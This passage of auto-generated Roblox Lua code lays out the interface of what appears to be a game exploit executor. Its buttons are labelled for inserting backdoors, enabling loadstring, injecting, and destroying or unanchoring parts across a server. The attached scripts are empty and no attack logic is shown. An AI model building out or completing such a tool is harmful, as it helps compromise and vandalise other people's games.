G2L["2d"]["Position"] = UDim2.new(0, 0, 2.82132, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.particle
G2L["2e"] = Instance.new("TextButton", G2L["10"]);
G2L["2e"]["TextWrapped"] = true;
G2L["2e"]["BorderSizePixel"] = 0;
G2L["2e"]["TextSize"] = 14;
G2L["2e"]["TextScaled"] = true;
G2L["2e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2e"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2e"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["Text"] = [[Particle All]];
G2L["2e"]["Name"] = [[particle]];
G2L["2e"]["Position"] = UDim2.new(0, 0, 2.93417, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.anchor
G2L["2f"] = Instance.new("TextButton", G2L["10"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[Unanchor All]];
G2L["2f"]["Name"] = [[anchor]];
G2L["2f"]["Position"] = UDim2.new(0, 0, 3.04702, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.clearrs
G2L["30"] = Instance.new("TextButton", G2L["10"]);
G2L["30"]["TextWrapped"] = true;
G2L["30"]["BorderSizePixel"] = 0;
G2L["30"]["TextSize"] = 14;
G2L["30"]["TextScaled"] = true;
G2L["30"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["30"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["30"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["30"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["30"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["30"]["Text"] = [[Clear ReplicatedStorage]];
G2L["30"]["Name"] = [[clearrs]];
G2L["30"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.backdoor
G2L["31"] = Instance.new("TextButton", G2L["10"]);
G2L["31"]["TextWrapped"] = true;
G2L["31"]["BorderSizePixel"] = 0;
G2L["31"]["TextSize"] = 14;
G2L["31"]["TextScaled"] = true;
G2L["31"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["31"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["31"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["31"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["31"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["Text"] = [[Insert a Backdoor]];
G2L["31"]["Name"] = [[backdoor]];
G2L["31"]["Position"] = UDim2.new(0, 0, 0.56426, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.loadstring
G2L["32"] = Instance.new("TextButton", G2L["10"]);
G2L["32"]["TextWrapped"] = true;
G2L["32"]["BorderSizePixel"] = 0;
G2L["32"]["TextSize"] = 14;
G2L["32"]["TextScaled"] = true;
G2L["32"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["32"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["32"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["32"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["32"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["Text"] = [[Enable loadstring]];
G2L["32"]["Name"] = [[loadstring]];
G2L["32"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fire
G2L["33"] = Instance.new("TextButton", G2L["10"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 14;
G2L["33"]["TextScaled"] = true;
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["33"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[Burn all Parts]];
G2L["33"]["Name"] = [[fire]];
G2L["33"]["Position"] = UDim2.new(0, 0, 1.80564, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.firering
G2L["34"] = Instance.new("TextButton", G2L["10"]);
G2L["34"]["TextWrapped"] = true;
G2L["34"]["BorderSizePixel"] = 0;
G2L["34"]["TextSize"] = 14;
G2L["34"]["TextScaled"] = true;
G2L["34"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["34"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["34"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Text"] = [[Ring of Fire]];
G2L["34"]["Name"] = [[firering]];
G2L["34"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fireringall
G2L["35"] = Instance.new("TextButton", G2L["10"]);
G2L["35"]["TextWrapped"] = true;
G2L["35"]["BorderSizePixel"] = 0;
G2L["35"]["TextSize"] = 14;
G2L["35"]["TextScaled"] = true;
G2L["35"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["35"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["35"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["35"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["35"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["Text"] = [[Ring of Fire All]];
G2L["35"]["Name"] = [[fireringall]];
G2L["35"]["Position"] = UDim2.new(0, 0, 1.46708, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.meteor
G2L["36"] = Instance.new("TextButton", G2L["10"]);
G2L["36"]["TextWrapped"] = true;
G2L["36"]["BorderSizePixel"] = 0;
G2L["36"]["TextSize"] = 14;
G2L["36"]["TextScaled"] = true;
G2L["36"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["36"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["36"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["Text"] = [[Meteor Shower]];
G2L["36"]["Name"] = [[meteor]];
G2L["36"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.Execute
G2L["37"] = Instance.new("ImageButton", G2L["4"]);
G2L["37"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["37"]["Image"] = [[rbxassetid://12099513379]];
G2L["37"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Name"] = [[Execute]];
G2L["37"]["Position"] = UDim2.new(0.05036, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Execute.LocalScript
G2L["38"] = Instance.new("LocalScript", G2L["37"]);



-- StarterGui.ScreenGui.Frame.Execute.UICorner
G2L["39"] = Instance.new("UICorner", G2L["37"]);



-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["3a"] = Instance.new("UIStroke", G2L["37"]);
G2L["3a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["3a"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Clear
G2L["3b"] = Instance.new("ImageButton", G2L["4"]);
G2L["3b"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["3b"]["Image"] = [[rbxassetid://9348208337]];
G2L["3b"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3b"]["Name"] = [[Clear]];
G2L["3b"]["Position"] = UDim2.new(0.19664, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Clear.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.Clear.UICorner
G2L["3d"] = Instance.new("UICorner", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["3e"] = Instance.new("UIStroke", G2L["3b"]);
G2L["3e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["3e"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Inject
G2L["3f"] = Instance.new("ImageButton", G2L["4"]);
G2L["3f"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["3f"]["Image"] = [[rbxassetid://136911114506878]];
G2L["3f"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Name"] = [[Inject]];
G2L["3f"]["Position"] = UDim2.new(0.86811, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["40"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["41"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["42"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["43"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.Inject.UICorner
G2L["44"] = Instance.new("UICorner", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["45"] = Instance.new("UIStroke", G2L["3f"]);
G2L["45"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["45"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["46"] = Instance.new("ImageButton", G2L["4"]);
G2L["46"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["46"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["46"]["ZIndex"] = 2;
G2L["46"]["Image"] = [[rbxassetid://5107183916]];
G2L["46"]["Size"] = UDim2.new(0, 40, 0, 36);
G2L["46"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["46"]["Position"] = UDim2.new(-0.079, 0, 0.16873, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["47"] = Instance.new("LocalScript", G2L["46"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["48"] = Instance.new("LocalScript", G2L["46"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UICorner
G2L["49"] = Instance.new("UICorner", G2L["46"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["4a"] = Instance.new("UIStroke", G2L["46"]);
G2L["4a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Line
G2L["4b"] = Instance.new("Frame", G2L["4"]);
G2L["4b"]["BorderSizePixel"] = 0;
G2L["4b"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4b"]["Size"] = UDim2.new(0, 417, 0, 13);
G2L["4b"]["Position"] = UDim2.new(0, 0, 1, 0);
G2L["4b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["4c"] = Instance.new("Frame", G2L["4"]);
G2L["4c"]["BorderSizePixel"] = 0;
G2L["4c"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4c"]["Size"] = UDim2.new(0, 33, 0, 310);
G2L["4c"]["Position"] = UDim2.new(-0.07914, 0, -0.03378, 0);
G2L["4c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4c"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.Line
G2L["4d"] = Instance.new("Frame", G2L["4c"]);
G2L["4d"]["BorderSizePixel"] = 0;
G2L["4d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Size"] = UDim2.new(0, 61, 0, 10);
G2L["4d"]["Position"] = UDim2.new(-0.24242, 0, 0, 0);
G2L["4d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.ImageLabel
G2L["4e"] = Instance.new("ImageLabel", G2L["4c"]);
G2L["4e"]["ZIndex"] = 10;
G2L["4e"]["BorderSizePixel"] = 0;
G2L["4e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["4e"]["Image"] = [[rbxassetid://81013369562879]];
G2L["4e"]["Size"] = UDim2.new(0, 45, 0, 41);
G2L["4e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4e"]["BackgroundTransparency"] = 1;
G2L["4e"]["Position"] = UDim2.new(-0.09091, 0, 0.02903, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["4f"] = Instance.new("Frame", G2L["4c"]);
G2L["4f"]["ZIndex"] = 1111111111;
G2L["4f"]["BorderSizePixel"] = 0;
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["4f"]["Position"] = UDim2.new(-0.13473, 0, 0.16237, 0);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["50"] = Instance.new("Frame", G2L["4c"]);
G2L["50"]["ZIndex"] = 1111111111;
G2L["50"]["BorderSizePixel"] = 0;
G2L["50"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["50"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["50"]["Position"] = UDim2.new(-0.04382, 0, 0.29785, 0);
G2L["50"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["51"] = Instance.new("Frame", G2L["4c"]);
G2L["51"]["ZIndex"] = 1111111111;
G2L["51"]["BorderSizePixel"] = 0;
G2L["51"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["51"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["51"]["Position"] = UDim2.new(-0.10443, 0, 0.44624, 0);
G2L["51"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["52"] = Instance.new("Frame", G2L["4c"]);
G2L["52"]["ZIndex"] = 1111111111;
G2L["52"]["BorderSizePixel"] = 0;
G2L["52"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["52"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["52"]["Position"] = UDim2.new(-0.10443, 0, 0.5914, 0);
G2L["52"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["53"] = Instance.new("Frame", G2L["4c"]);
G2L["53"]["ZIndex"] = 1111111111;
G2L["53"]["BorderSizePixel"] = 0;
G2L["53"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
G2L["53"]["Size"] = UDim2.new(0, 47, 0, 124);
G2L["53"]["Position"] = UDim2.new(-0.10443, 0, 0.62366, 0);
G2L["53"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel
G2L["54"] = Instance.new("TextLabel", G2L["53"]);
G2L["54"]["TextWrapped"] = true;
G2L["54"]["BorderSizePixel"] = 0;
G2L["54"]["TextSize"] = 14;
G2L["54"]["TextScaled"] = true;
G2L["54"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["54"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["54"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["54"]["BackgroundTransparency"] = 1;
G2L["54"]["Size"] = UDim2.new(0, 38, 0, 37);
G2L["54"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["54"]["Text"] = [[3.5.2]];
G2L["54"]["Position"] = UDim2.new(0.06383, 0, 0.39024, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
G2L["55"] = Instance.new("LocalScript", G2L["54"]);



-- StarterGui.ScreenGui.Frame.Line
G2L["56"] = Instance.new("Frame", G2L["4"]);
G2L["56"]["ZIndex"] = 3;
G2L["56"]["BorderSizePixel"] = 0;
G2L["56"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["Size"] = UDim2.new(0, 7, 0, 319);
G2L["56"]["Position"] = UDim2.new(0.01679, 0, -0.03378, 0);
G2L["56"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["57"] = Instance.new("Frame", G2L["4"]);
G2L["57"]["ZIndex"] = 3;
G2L["57"]["BorderSizePixel"] = 0;
G2L["57"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["57"]["Size"] = UDim2.new(0, 8, 0, 319);
G2L["57"]["Position"] = UDim2.new(-0.09832, 0, -0.03378, 0);
G2L["57"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["57"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["58"] = Instance.new("Frame", G2L["4"]);
G2L["58"]["ZIndex"] = 3;
G2L["58"]["BorderSizePixel"] = 0;
G2L["58"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["58"]["Size"] = UDim2.new(0, 464, 0, 9);
G2L["58"]["Position"] = UDim2.new(-0.09832, 0, 1.01351, 0);
G2L["58"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["58"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["59"] = Instance.new("Frame", G2L["4"]);
G2L["59"]["ZIndex"] = 3;
G2L["59"]["BorderSizePixel"] = 0;
G2L["59"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["59"]["Size"] = UDim2.new(0, -6, 0, 319);
G2L["59"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["59"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["59"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Close
G2L["5a"] = Instance.new("ImageButton", G2L["4"]);
G2L["5a"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["5a"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["5a"]["ZIndex"] = 2;
G2L["5a"]["Image"] = [[rbxassetid://12935062141]];
G2L["5a"]["Size"] = UDim2.new(0, 37, 0, 37);
G2L["5a"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["5a"]["Name"] = [[Close]];
G2L["5a"]["Position"] = UDim2.new(-0.07914, 0, 0.46411, 0);


-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["5b"] = Instance.new("LocalScript", G2L["5a"]);



-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["5c"] = Instance.new("LocalScript", G2L["5a"]);



-- StarterGui.ScreenGui.Frame.Close.UIStroke
G2L["5d"] = Instance.new("UIStroke", G2L["5a"]);
G2L["5d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Close.UICorner
G2L["5e"] = Instance.new("UICorner", G2L["5a"]);



-- StarterGui.ScreenGui.Frame.LabelFrame
G2L["5f"] = Instance.new("Frame", G2L["4"]);
G2L["5f"]["BorderSizePixel"] = 0;
G2L["5f"]["BackgroundColor3"] = Color3.fromRGB(37, 37, 37);
G2L["5f"]["Size"] = UDim2.new(0, 138, 0, 50);
G2L["5f"]["Position"] = UDim2.new(0.35731, 0, 0.78378, 0);
G2L["5f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5f"]["Name"] = [[LabelFrame]];


-- StarterGui.ScreenGui.Frame.LabelFrame.RemoteLabel
G2L["60"] = Instance.new("TextLabel", G2L["5f"]);
G2L["60"]["TextWrapped"] = true;
G2L["60"]["BorderSizePixel"] = 0;
G2L["60"]["TextSize"] = 14;
G2L["60"]["TextScaled"] = true;
G2L["60"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["60"]["TextColor3"] = Color3.fromRGB(207, 207, 207);
G2L["60"]["BackgroundTransparency"] = 1;
G2L["60"]["Size"] = UDim2.new(0, 138, 0, 50);
G2L["60"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["60"]["Text"] = [[Press Inject!]];
G2L["60"]["Name"] = [[RemoteLabel]];


-- StarterGui.ScreenGui.Frame.LabelFrame.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.LabelFrame.UICorner
G2L["62"] = Instance.new("UICorner", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.TextButton
G2L["63"] = Instance.new("TextButton", G2L["4"]);
G2L["63"]["TextWrapped"] = true;
G2L["63"]["BorderSizePixel"] = 0;
G2L["63"]["TextSize"] = 14;
G2L["63"]["TextScaled"] = true;
G2L["63"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["63"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["63"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["63"]["Size"] = UDim2.new(0, 35, 0, 35);
G2L["63"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["63"]["Text"] = [[RE]];
G2L["63"]["Position"] = UDim2.new(-0.07434, 0, 0.31757, 0);


-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["64"] = Instance.new("LocalScript", G2L["63"]);



-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["65"] = Instance.new("LocalScript", G2L["63"]);



-- StarterGui.ScreenGui.Frame.TextButton.UICorner
G2L["66"] = Instance.new("UICorner", G2L["63"]);



-- StarterGui.ScreenGui.Frame.TextButton.UIStroke
G2L["67"] = Instance.new("UIStroke", G2L["63"]);
G2L["67"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Frame
G2L["68"] = Instance.new("Frame", G2L["4"]);
G2L["68"]["BorderSizePixel"] = 0;
G2L["68"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["Size"] = UDim2.new(0, 558, 0, 316);
G2L["68"]["Position"] = UDim2.new(-0.09113, 0, -0.02365, 0);
G2L["68"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.Frame.UIStroke
G2L["69"] = Instance.new("UIStroke", G2L["68"]);
G2L["69"]["Thickness"] = 5;


-- StarterGui.ScreenGui.Frame.GamesFrame
G2L["6a"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["6a"]["Visible"] = false;
G2L["6a"]["Active"] = true;
G2L["6a"]["BorderSizePixel"] = 0;
G2L["6a"]["CanvasSize"] = UDim2.new(0, 0, 1, 0);
G2L["6a"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6a"]["Name"] = [[GamesFrame]];
G2L["6a"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["6a"]["Size"] = UDim2.new(0, 105, 0, 322);
G2L["6a"]["Position"] = UDim2.new(-0.35252, 0, -0.03857, 0);
G2L["6a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6a"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.GamesFrame.UICorner
G2L["6b"] = Instance.new("UICorner", G2L["6a"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.UIStroke
G2L["6c"] = Instance.new("UIStroke", G2L["6a"]);
G2L["6c"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD1
G2L["6d"] = Instance.new("TextButton", G2L["6a"]);
G2L["6d"]["TextWrapped"] = true;
G2L["6d"]["BorderSizePixel"] = 0;
G2L["6d"]["TextSize"] = 14;
G2L["6d"]["TextScaled"] = true;
G2L["6d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6d"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6d"]["Size"] = UDim2.new(0, 76, 0, 74);
G2L["6d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6d"]["Text"] = [[Backdoor game]];
G2L["6d"]["Name"] = [[BD1]];
G2L["6d"]["Position"] = UDim2.new(0.12, 0, 0.03086, 0);


-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.UICorner
G2L["6e"] = Instance.new("UICorner", G2L["6d"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.UIStroke
G2L["6f"] = Instance.new("UIStroke", G2L["6d"]);
G2L["6f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.LocalScript
G2L["70"] = Instance.new("LocalScript", G2L["6d"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.UIListLayout
G2L["71"] = Instance.new("UIListLayout", G2L["6a"]);
G2L["71"]["HorizontalAlignment"] = Enum.HorizontalAlignment.Center;
G2L["71"]["Padding"] = UDim.new(0, 10);
G2L["71"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD2
G2L["72"] = Instance.new("TextButton", G2L["6a"]);
G2L["72"]["TextWrapped"] = true;
G2L["72"]["BorderSizePixel"] = 0;
G2L["72"]["TextSize"] = 14;
G2L["72"]["TextScaled"] = true;
G2L["72"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["72"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["72"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["72"]["Size"] = UDim2.new(0, 76, 0, 74);
G2L["72"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["72"]["Text"] = [[School]];
G2L["72"]["Name"] = [[BD2]];
G2L["72"]["Position"] = UDim2.new(0.12, 0, 0.03086, 0);


-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.UICorner
G2L["73"] = Instance.new("UICorner", G2L["72"]);



-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.UIStroke
G2L["74"] = Instance.new("UIStroke", G2L["72"]);
G2L["74"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.LocalScript
G2L["75"] = Instance.new("LocalScript", G2L["72"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame
G2L["76"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["76"]["Visible"] = false;
G2L["76"]["Active"] = true;
G2L["76"]["BorderSizePixel"] = 0;
G2L["76"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["76"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
